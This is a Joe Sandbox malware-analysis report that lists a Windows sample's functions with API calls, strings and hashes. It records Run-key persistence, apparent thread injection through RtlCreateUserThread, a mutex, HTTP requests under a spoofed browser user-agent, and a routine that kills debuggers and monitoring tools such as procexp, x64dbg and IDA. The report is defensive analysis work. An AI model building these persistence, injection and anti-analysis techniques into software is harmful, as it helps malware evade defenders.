                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction ID: c126a2d1605346789c162097840d7e38ea42cb33e2498984e491b2cd4cda57f7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09115E36628A8086D7909B14F44472EF7A0FB947A0F545235F9AE43BE8DF7CD185CB24
                                                                                                                                                                                                                        Function 00007FF7E83C3AE4 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 423 7ff7e83c3ae4-7ff7e83c3af3 424 7ff7e83c3af5-7ff7e83c3b02 VirtualFree 423->424 425 7ff7e83c3b08-7ff7e83c3b0c 423->425 424->425
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction ID: e05274b568db1f5d0e613bacec9d06c5199fbc2a3c3a04a39bc81dd096c6eeee
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACD01221E3994181E794EB26E88971DFBA0FBD4744FC4803AE68941964CF3CC199CF15
                                                                                                                                                                                                                        Function 00007FF7E83C3B14 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 426 7ff7e83c3b14-7ff7e83c3b3a VirtualAlloc
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                        • Opcode ID: 7ed7f4f9e3a1e5303470ef457a719a49b487dd8a302f99ec74e3d8dd35d9eee5
                                                                                                                                                                                                                        • Instruction ID: 8f9c47c137280ac90897d665caccbc8c589cb66026086c33fb9a485b04da9387
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ed7f4f9e3a1e5303470ef457a719a49b487dd8a302f99ec74e3d8dd35d9eee5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AC012B1F261808BDB1CAF22E491B0AAA60A794740F908429EA4267B84C93EC2528F04

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF7E83C2160 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7E83C219D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction ID: e4d35375bcd706865b47436049aae05167bca1d68c155442bf7ce8ca814174d1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD710832518A8186E760EB51F49832EF7A0FBD4794F94103AEA8E43A68CF7CD5448B25
                                                                                                                                                                                                                        Function 00007FF7E83C10D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: fce28ca8dba2a3c9788a4213c94c3a151d22471c4bb07c72d52477b5afe40e79
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66713B32A0CA8186E770EB14E44436EF3A0FB94384F94413AD68D82B99DF7CD484DB66
                                                                                                                                                                                                                        Function 00007FF7E83C3DE4 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction ID: f20dea61b24e2115bc116d4d495728aa2864a0370a8979b60e25d233de1a3829
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39210331A1CA8581EB70EF21E84836EF360FBE4754F84423AC69D429A8DF3DD545CB25
                                                                                                                                                                                                                        Function 00007FF7E83C339C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Version
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                                                                                        • Opcode ID: b7b7595815e33f1c26c97fb711478bec0568d9ece5cc850361180fa3fc2c026a
                                                                                                                                                                                                                        • Instruction ID: 7e0d0ed0ee09b1515a22fb937017c3f209df4328051921ce4283baa02d9df81a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7b7595815e33f1c26c97fb711478bec0568d9ece5cc850361180fa3fc2c026a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EAF0AF3190C242C2EE74DA01A90937DF2E0E76D348FC8027FD24C415A4DE3DD5488E3A
                                                                                                                                                                                                                        Function 00007FF7E83C1444 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                        • Opcode ID: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction ID: 9df142c4c7b62e77ddedd520d0f8db78673d6c2fab0884f93f4c12e2754584f8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AE03922A1C051C2E7605720E50433EF2F6F7A4B44F844636EA8DC2694EE3CCA409A65
                                                                                                                                                                                                                        Function 00007FF7E83C4524 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0
                                                                                                                                                                                                                        • Opcode ID: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction ID: 69b50339a104226ac0822bbb01622a2093fbeb45684e1a5f8aaa66bffc939306
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF811B36608B8186EA50DB55F88436EF7A0FBD8B91F55413ADA8D83B68DF3CD0448B25
                                                                                                                                                                                                                        Function 00007FF7E83C306C Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C4404: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C30A7), ref: 00007FF7E83C444C
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C4404: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C30A7), ref: 00007FF7E83C4489
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C4404: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C30A7), ref: 00007FF7E83C4494
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3B44: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C30AC), ref: 00007FF7E83C3B87
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3B44: RegSetValueExW.ADVAPI32 ref: 00007FF7E83C3BBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3B44: RegCloseKey.ADVAPI32 ref: 00007FF7E83C3BCC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3BE4: RegDeleteKeyW.ADVAPI32 ref: 00007FF7E83C3BFC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7E83C3DF7
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: Process32FirstW.KERNEL32 ref: 00007FF7E83C3E2A
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: CloseHandle.KERNEL32 ref: 00007FF7E83C3E3C
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: wcscmp.MSVCRT ref: 00007FF7E83C3E51
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: OpenProcess.KERNEL32 ref: 00007FF7E83C3E67
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: TerminateProcess.KERNEL32 ref: 00007FF7E83C3E8A
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: CloseHandle.KERNEL32 ref: 00007FF7E83C3E98
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: Process32NextW.KERNEL32 ref: 00007FF7E83C3EAB
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: CloseHandle.KERNEL32 ref: 00007FF7E83C3EBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3974: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7E83C3ACC), ref: 00007FF7E83C39A4
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF7E83C3156
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 2853470409-928700279
                                                                                                                                                                                                                        • Opcode ID: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction ID: 262df8187808062b512ddefaa40ac794eb0b1c0d513bd8a1ced712c303b1c41a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A217420E1954290EA00FB64D8953BDF621AF70351FD8013FD41D526F2AEBEE609823B
                                                                                                                                                                                                                        Function 00007FF7E83C2DFC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        • Opcode ID: 38ee3acfd37bcc54bc171a250b67dee5856fd1290622cbb628fe660574ac1ff6
                                                                                                                                                                                                                        • Instruction ID: a8f475d85995e347670d28ec16e36d690cbb5a8e53a99471539329ead1cc4c52
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38ee3acfd37bcc54bc171a250b67dee5856fd1290622cbb628fe660574ac1ff6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F01AD2690CA0285E730AB21E85432DF760FBECB55F89053AD94E52A74CF3CD685863A
                                                                                                                                                                                                                        Function 00007FF7E83C2E9C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction ID: 7d70f67560cfbdbef18f3b323d54a14e2349a61cc3b8a0cd3ea9d83f982817ab
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B001D22691CA4586E730BB11E85432DF770FBE8B45F85053AE98E52A68CF3CD6448635
                                                                                                                                                                                                                        Function 00007FF7E83C3CA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction ID: d2af7c4cdbdc09aaff1f15088e76a923dd5f007ca89f9919eabf8dc7213fd7a9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
